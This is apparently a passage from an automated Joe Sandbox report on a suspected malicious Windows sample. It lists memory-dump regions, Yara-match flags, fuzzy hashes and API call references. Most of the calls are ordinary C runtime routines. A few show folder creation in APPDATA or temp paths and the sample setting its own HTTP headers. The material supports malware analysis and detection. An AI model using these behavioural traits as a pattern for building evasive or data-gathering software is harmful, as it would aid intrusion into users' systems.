                                                                    • Source File: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e80000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a72ccc6e8b489e63011b81e3a8a50db20cbc6dad3c7a88df22060b293fe79ba1
                                                                    • Instruction ID: e0002f80c5770fe19e6f1d5788cbf73fbf56f532de9f6c1ba9693e850b4df916
                                                                    • Opcode Fuzzy Hash: a72ccc6e8b489e63011b81e3a8a50db20cbc6dad3c7a88df22060b293fe79ba1
                                                                    • Instruction Fuzzy Hash: 99118663F30C255B675C816D8C172BAA5D2EBDC25074F533AD826E7384E9A4DE23D290
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                     • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a72ccc6e8b489e63011b81e3a8a50db20cbc6dad3c7a88df22060b293fe79ba1
                                                                    • Instruction ID: f1e66852e6b8581706c01849561528f719d4aeccf6fe4fc0aff0fb2656777429
                                                                    • Opcode Fuzzy Hash: a72ccc6e8b489e63011b81e3a8a50db20cbc6dad3c7a88df22060b293fe79ba1
                                                                    • Instruction Fuzzy Hash: D6118A73F30C255B675C816D8C172BAA5D2EBDC25074F533AD826E7284E998DE23D290
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e80000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                    • Instruction ID: 1e454456d46afa4b78172a060a6d3e9afebdc84f0249368066f99fc11d60397c
                                                                    • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                    • Instruction Fuzzy Hash: D311577720004147FA14EA7DD5B42BAE396EBC6328B2C767BD04E6B348D222ED449702
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                     • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                    • Instruction ID: bf3d62387290270b8e9c206f9b330aa6ec5fad9da35dacc9460757c01b80fc97
                                                                    • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                    • Instruction Fuzzy Hash: 43115EF730038143D704862EC5B45B7E395EBC6321B2F4B7BC0825B7C8C23A9865E50A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3223708397.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                     • Associated: 00000000.00000002.3223691367.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                     • Associated: 00000000.00000002.3223729109.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                                     • Associated: 00000000.00000002.3223747769.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                    • Instruction ID: 6858cf0c51ff5caabfc3a7f957f7e97cc4d55c404d013567cdc706fa4bfc5bf2
                                                                    • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                    • Instruction Fuzzy Hash: 5111087774118243D681C56DC4F86ABA3DEFBC52A0729436AF0D28FA58D2F2DAC5A600
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3220928056.0000000000D99000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D99000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d99000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                    • Instruction ID: dc6b87ce58b20cb33b0593cbf4f383ff20eb63e77c8acf69c45932d60aecd79a
                                                                    • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                    • Instruction Fuzzy Hash: 79115E72340100AFDB54DF59DCD1EA6B3EAEB89320B298169ED04CB316E675EC41C770
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e80000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                    • Instruction ID: 4b774c0f43436876bdca649e67839ea7ebc3faf03d69ce9f04b8d53551ad7d40
                                                                    • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                    • Instruction Fuzzy Hash: 8601F272A006008FDF61EF60C805BAB33E5FB8630AF0544A4D90EA7281E370A9498B80
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e80000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 938b1ef97d91fa147a56b9632c6ce73ee018995428c08987881a566186e623af
                                                                    • Instruction ID: d7f8151201f1939aecba355e2b9a815538efd851797e54eadf98ec4ebdf1dd9c
                                                                    • Opcode Fuzzy Hash: 938b1ef97d91fa147a56b9632c6ce73ee018995428c08987881a566186e623af
                                                                    • Instruction Fuzzy Hash: 94E08C72921228EBCB24DB98C905D8AF7FCEB44B40B114096F901E3240C270DF40C7D0
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 938b1ef97d91fa147a56b9632c6ce73ee018995428c08987881a566186e623af
                                                                    • Instruction ID: fd5c11342e53f5fd9e78528a8d63764efe72d1229905d7d1658511e5362cd08d
                                                                    • Opcode Fuzzy Hash: 938b1ef97d91fa147a56b9632c6ce73ee018995428c08987881a566186e623af
                                                                    • Instruction Fuzzy Hash: EEE04632911228EBCB24DF898A08A8AF3ACEB44B09B11049AB501D3210C274DE80C7D4
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3223708397.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.3223691367.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3223729109.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3223747769.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 225e9490ce15994035050fff8e8d94bbe50aeb352c3921d505d22bbc77bda227
                                                                    • Instruction ID: 49573a245b17cd2143a7f0a663dc82b9d5ba07e6c12e429f55ccbb336c262c76
                                                                    • Opcode Fuzzy Hash: 225e9490ce15994035050fff8e8d94bbe50aeb352c3921d505d22bbc77bda227
                                                                    • Instruction Fuzzy Hash: CEE08C32E11228EBCB10CB88C940E8AB3ECFB86A80F114096B505E3101D274DF00C7C2
                                                                    APIs
                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(0042AF64,00000FA0,?,?,00409066), ref: 00409094
                                                                    • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00409066), ref: 0040909F
                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00409066), ref: 004090B0
                                                                    • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 004090C2
                                                                    • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 004090D0
                                                                    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00409066), ref: 004090F3
                                                                    • RtlDeleteCriticalSection.NTDLL(0042AF64), ref: 0040910F
                                                                    • CloseHandle.KERNEL32(00000000,?,?,00409066), ref: 0040911F
                                                                    Strings
                                                                    • SleepConditionVariableCS, xrefs: 004090BC
                                                                    • api-ms-win-core-synch-l1-2-0.dll, xrefs: 0040909A
                                                                    • kernel32.dll, xrefs: 004090AB
                                                                    • WakeAllConditionVariable, xrefs: 004090C8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                                    • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                    • API String ID: 2565136772-3242537097
                                                                    APIs
                                                                    • ___free_lconv_mon.LIBCMT ref: 00E9748E
                                                                      • Part of subcall function 00E9714A: _free.LIBCMT ref: 00E97167
                                                                      • Part of subcall function 00E9714A: _free.LIBCMT ref: 00E97179
                                                                      • Part of subcall function 00E9714A: _free.LIBCMT ref: 00E9718B
                                                                      • Part of subcall function 00E9714A: _free.LIBCMT ref: 00E9719D
                                                                      • Part of subcall function 00E9714A: _free.LIBCMT ref: 00E971AF
                                                                      • Part of subcall function 00E9714A: _free.LIBCMT ref: 00E971C1
                                                                      • Part of subcall function 00E9714A: _free.LIBCMT ref: 00E971D3
                                                                      • Part of subcall function 00E9714A: _free.LIBCMT ref: 00E971E5
                                                                      • Part of subcall function 00E9714A: _free.LIBCMT ref: 00E971F7
                                                                      • Part of subcall function 00E9714A: _free.LIBCMT ref: 00E97209
                                                                      • Part of subcall function 00E9714A: _free.LIBCMT ref: 00E9721B
                                                                      • Part of subcall function 00E9714A: _free.LIBCMT ref: 00E9722D
                                                                      • Part of subcall function 00E9714A: _free.LIBCMT ref: 00E9723F
                                                                    • _free.LIBCMT ref: 00E97483
                                                                      • Part of subcall function 00E91D29: HeapFree.KERNEL32(00000000,00000000,?,00E972DB,?,00000000,?,?,?,00E97302,?,00000007,?,?,00E975E1,?), ref: 00E91D3F
                                                                      • Part of subcall function 00E91D29: GetLastError.KERNEL32(?,?,00E972DB,?,00000000,?,?,?,00E97302,?,00000007,?,?,00E975E1,?,?), ref: 00E91D51
                                                                    • _free.LIBCMT ref: 00E974A5
                                                                    • _free.LIBCMT ref: 00E974BA
                                                                    • _free.LIBCMT ref: 00E974C5
                                                                    • _free.LIBCMT ref: 00E974E7
                                                                    • _free.LIBCMT ref: 00E974FA
                                                                    • _free.LIBCMT ref: 00E97508
                                                                    • _free.LIBCMT ref: 00E97513
                                                                    • _free.LIBCMT ref: 00E9754B
                                                                    • _free.LIBCMT ref: 00E97552
                                                                    • _free.LIBCMT ref: 00E9756F
                                                                    • _free.LIBCMT ref: 00E97587
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e80000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                    • String ID:
                                                                    • API String ID: 161543041-0
                                                                    APIs
                                                                    • ___free_lconv_mon.LIBCMT ref: 00417227
                                                                      • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F00
                                                                      • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F12
                                                                      • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F24
                                                                      • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F36
                                                                      • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F48
                                                                      • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F5A
                                                                      • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F6C
                                                                      • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F7E
                                                                      • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F90
                                                                      • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416FA2
                                                                      • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416FB4
                                                                      • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416FC6
                                                                      • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416FD8
                                                                    • _free.LIBCMT ref: 0041721C
                                                                      • Part of subcall function 00411AC2: RtlFreeHeap.NTDLL(00000000,00000000,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?), ref: 00411AD8
                                                                      • Part of subcall function 00411AC2: GetLastError.KERNEL32(?,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?,?), ref: 00411AEA
                                                                    • _free.LIBCMT ref: 0041723E
                                                                    • _free.LIBCMT ref: 00417253
                                                                    • _free.LIBCMT ref: 0041725E
                                                                    • _free.LIBCMT ref: 00417280
                                                                    • _free.LIBCMT ref: 00417293
                                                                    • _free.LIBCMT ref: 004172A1
                                                                    • _free.LIBCMT ref: 004172AC
                                                                    • _free.LIBCMT ref: 004172E4
                                                                    • _free.LIBCMT ref: 004172EB
                                                                    • _free.LIBCMT ref: 00417308
                                                                    • _free.LIBCMT ref: 00417320
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                    • String ID:
                                                                    • API String ID: 161543041-0
                                                                    APIs
                                                                    • IsInExceptionSpec.LIBVCRUNTIME ref: 00E8B43F
                                                                    • type_info::operator==.LIBVCRUNTIME ref: 00E8B461
                                                                    • ___TypeMatch.LIBVCRUNTIME ref: 00E8B570
                                                                    • IsInExceptionSpec.LIBVCRUNTIME ref: 00E8B642
                                                                    • _UnwindNestedFrames.LIBCMT ref: 00E8B6C6
                                                                    • CallUnexpected.LIBVCRUNTIME ref: 00E8B6E1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e80000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                    • String ID: csm$csm$csm
                                                                    • API String ID: 2123188842-393685449
                                                                    APIs
                                                                    • IsInExceptionSpec.LIBVCRUNTIME ref: 0040B1D8
                                                                    • type_info::operator==.LIBVCRUNTIME ref: 0040B1FA
                                                                    • ___TypeMatch.LIBVCRUNTIME ref: 0040B309
                                                                    • IsInExceptionSpec.LIBVCRUNTIME ref: 0040B3DB
                                                                    • _UnwindNestedFrames.LIBCMT ref: 0040B45F
                                                                    • CallUnexpected.LIBVCRUNTIME ref: 0040B47A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                    • String ID: csm$csm$csm
                                                                    • API String ID: 2123188842-393685449
                                                                    APIs
                                                                    • __EH_prolog3_GS.LIBCMT ref: 10001CE7
                                                                    • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,00000264,1000202E,?), ref: 10001D2D
                                                                    • CreateDirectoryA.KERNEL32(?,00000000,?,?,00000000,?,?,00000001,00000000), ref: 10001DE9
                                                                    • GetLastError.KERNEL32(?,?,00000001,00000000), ref: 10001DF9
                                                                    • GetTempPathA.KERNEL32(00000104,?,?,?,00000001,00000000), ref: 10001E12
                                                                    • CreateDirectoryA.KERNEL32(?,00000000,?,?,00000000,?,?,00000001,00000000,?,?,00000001,00000000), ref: 10001ECC
                                                                    • GetLastError.KERNEL32(?,?,00000001,00000000,?,?,00000001,00000000), ref: 10001ED2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3223708397.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.3223691367.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.3223729109.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.3223747769.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: CreateDirectoryErrorLastPath$FolderH_prolog3_Temp
                                                                    • String ID: APPDATA$TMPDIR
                                                                    • API String ID: 1838500112-4048745339
                                                                    APIs
                                                                    • __EH_prolog3_GS.LIBCMT ref: 100010CE
                                                                    • HttpAddRequestHeadersA.WININET(?,?,?,20000000), ref: 10001103
                                                                    • HttpAddRequestHeadersA.WININET(?,?,?,20000000), ref: 10001123
                                                                    • HttpAddRequestHeadersA.WININET(?,?,?,20000000), ref: 10001143
                                                                    • HttpAddRequestHeadersA.WININET(?,?,?,20000000), ref: 10001163
                                                                    Strings
                                                                    • Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1, xrefs: 100010D9
                                                                    • Accept-Language: ru-RU,ru;q=0.9,en;q=0.8, xrefs: 10001105
                                                                    • Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0, xrefs: 10001145
                                                                    • Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1, xrefs: 10001125
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3223708397.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.3223691367.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.3223729109.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.3223747769.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: HeadersHttpRequest$H_prolog3_
                                                                    • String ID: Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1$Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0$Accept-Language: ru-RU,ru;q=0.9,en;q=0.8$Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                    • API String ID: 1254599795-787135837
                                                                    • Opcode ID: 8d3d7825b2bb6dea36e27622bcd4b7ddfc44603214986a735072bca3a8471053
                                                                    • Instruction ID: 505ec4d7c45309835e960384523a5e30396a54de81b8e769e2ad7823f420ed9d
                                                                    • Opcode Fuzzy Hash: 8d3d7825b2bb6dea36e27622bcd4b7ddfc44603214986a735072bca3a8471053
                                                                    • Instruction Fuzzy Hash: DA119372D0010DEEEB10DBA9DC91DEEBB78EB18351FA0C019F22176051DB75AA45DBB1
                                                                    APIs
                                                                    • _free.LIBCMT ref: 00E91362
                                                                      • Part of subcall function 00E91D29: HeapFree.KERNEL32(00000000,00000000,?,00E972DB,?,00000000,?,?,?,00E97302,?,00000007,?,?,00E975E1,?), ref: 00E91D3F
                                                                      • Part of subcall function 00E91D29: GetLastError.KERNEL32(?,?,00E972DB,?,00000000,?,?,?,00E97302,?,00000007,?,?,00E975E1,?,?), ref: 00E91D51
                                                                    • _free.LIBCMT ref: 00E9136E
                                                                    • _free.LIBCMT ref: 00E91379
                                                                    • _free.LIBCMT ref: 00E91384
                                                                    • _free.LIBCMT ref: 00E9138F
                                                                    • _free.LIBCMT ref: 00E9139A
                                                                    • _free.LIBCMT ref: 00E913A5
                                                                    • _free.LIBCMT ref: 00E913B0
                                                                    • _free.LIBCMT ref: 00E913BB
                                                                    • _free.LIBCMT ref: 00E913C9
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e80000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: fe283fd8c536959d9cbb52a3305d3fc21224adf50181bca55d874b9ff2adc1f7
                                                                    • Instruction ID: 421cd44e082eac1a8268aa391fc149ab6299e8ed057a9a8348a91a10493fbb72
                                                                    • Opcode Fuzzy Hash: fe283fd8c536959d9cbb52a3305d3fc21224adf50181bca55d874b9ff2adc1f7
                                                                    • Instruction Fuzzy Hash: F321A47A90011DEFCF05EFA5D881DDE7BB8AF08341B0165A6B615AB121DB31EA44CB81
                                                                    APIs
                                                                    • _free.LIBCMT ref: 004110FB
                                                                      • Part of subcall function 00411AC2: RtlFreeHeap.NTDLL(00000000,00000000,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?), ref: 00411AD8
                                                                      • Part of subcall function 00411AC2: GetLastError.KERNEL32(?,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?,?), ref: 00411AEA
                                                                    • _free.LIBCMT ref: 00411107
                                                                    • _free.LIBCMT ref: 00411112
                                                                    • _free.LIBCMT ref: 0041111D
                                                                    • _free.LIBCMT ref: 00411128
                                                                    • _free.LIBCMT ref: 00411133
                                                                    • _free.LIBCMT ref: 0041113E
                                                                    • _free.LIBCMT ref: 00411149
                                                                    • _free.LIBCMT ref: 00411154
                                                                    • _free.LIBCMT ref: 00411162
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: 9528e1cdbf83faf96e5ccd5663a9dae100ce71697e6d3b34ec1221184646fa63
                                                                    • Instruction ID: 5835e015de09c4cc1f53331febaa62aeb6779b48f58b4a69f4cd00ff2e5db2ca
                                                                    • Opcode Fuzzy Hash: 9528e1cdbf83faf96e5ccd5663a9dae100ce71697e6d3b34ec1221184646fa63
                                                                    • Instruction Fuzzy Hash: 3D219876900108AFCB41EF95C881DDE7FB9BF48344B0445ABB6199B121EB75DA84CB84
                                                                    APIs
                                                                    • RtlDecodePointer.NTDLL(?), ref: 0041A622
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: DecodePointer
                                                                    • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                    • API String ID: 3527080286-3064271455
                                                                    • Opcode ID: b0f5ff7df8ac5b22e86cd4b492fd97d41adae4fcfb0b2561f3f2f1ad21474b7f
                                                                    • Instruction ID: 98f7bf46ea2d04c7b06ac9836e821450726948aa73f1de9436264de5739e925b
                                                                    • Opcode Fuzzy Hash: b0f5ff7df8ac5b22e86cd4b492fd97d41adae4fcfb0b2561f3f2f1ad21474b7f
                                                                    • Instruction Fuzzy Hash: 5651ACB490121ACBDF109FA8E94C1EEBBB0FB05300F554047D4A1A62A5C77CCAF68B5E
                                                                    APIs
                                                                    • type_info::operator==.LIBVCRUNTIME ref: 10004250
                                                                    • ___TypeMatch.LIBVCRUNTIME ref: 1000435E
                                                                    • _UnwindNestedFrames.LIBCMT ref: 100044B0
                                                                    • CallUnexpected.LIBVCRUNTIME ref: 100044CB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3223708397.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.3223691367.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.3223729109.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.3223747769.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                    • String ID: csm$csm$csm
                                                                    • API String ID: 2751267872-393685449
                                                                    • Opcode ID: c4421cf047d38b61ed069ce13853ee51e8b724bc32a0b317f19ee854d316b146
                                                                    • Instruction ID: 3d3d7b973083d5502e03e9704e538657a8ad6664bd6ca03923258a49de60437f
                                                                    • Opcode Fuzzy Hash: c4421cf047d38b61ed069ce13853ee51e8b724bc32a0b317f19ee854d316b146
                                                                    • Instruction Fuzzy Hash: C0B180B5C00209DFEF05DF94D881A9EBBB9FF04390F12415AF8116B21ADB31EA51CB99
                                                                    APIs
                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(0042AF64,00000FA0,?,?,00E892CD), ref: 00E892FB
                                                                    • GetModuleHandleW.KERNEL32(0041DFB8,?,?,00E892CD), ref: 00E89306
                                                                    • GetModuleHandleW.KERNEL32(0041DFFC,?,?,00E892CD), ref: 00E89317
                                                                    • GetProcAddress.KERNEL32(00000000,0041E018), ref: 00E89329
                                                                    • GetProcAddress.KERNEL32(00000000,0041E034), ref: 00E89337
                                                                    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00E892CD), ref: 00E8935A
                                                                    • RtlDeleteCriticalSection.NTDLL(0042AF64), ref: 00E89376
                                                                    • CloseHandle.KERNEL32(0042AF60,?,?,00E892CD), ref: 00E89386
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
